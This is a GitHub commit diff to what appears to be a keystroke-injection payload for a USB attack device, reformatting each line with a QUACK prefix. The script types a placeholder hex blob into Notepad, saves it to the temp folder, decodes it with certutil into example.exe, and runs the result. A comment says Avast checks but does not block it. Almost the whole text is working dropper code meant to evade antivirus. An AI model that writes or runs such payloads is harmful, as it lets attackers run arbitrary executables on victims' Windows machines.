pull/638/head
Aleff 2023-07-22 09:59:23 +02:00 committed by GitHub
parent 3a9b3c0e51
commit 78b59bcedc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 29 deletions

View File

@ -18,35 +18,35 @@
* - Running checked but not blocked by Avast antivirus
GUI r
DELAY 1000
STRING notepad.exe
ENTER
DELAY 2000
QUACK GUI r
QUACK DELAY 1000
QUACK STRING notepad.exe
QUACK ENTER
QUACK DELAY 2000
* Define here your hexadecimal code
STRING #HEX_CODE
QUACK STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRING "%TEMP%\example.hex"
ENTER
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRING certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
ENTER
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRING "%TEMP%\example.exe"
ENTER
QUACK DELAY 2000
QUACK ALT F
QUACK DELAY 1000
QUACK STRING S
QUACK DELAY 1000
QUACK STRING "%TEMP%\example.hex"
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 1000
QUACK ALT F4
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
QUACK DELAY 1000
QUACK GUI r
QUACK DELAY 250
QUACK STRING "%TEMP%\example.exe"
QUACK ENTER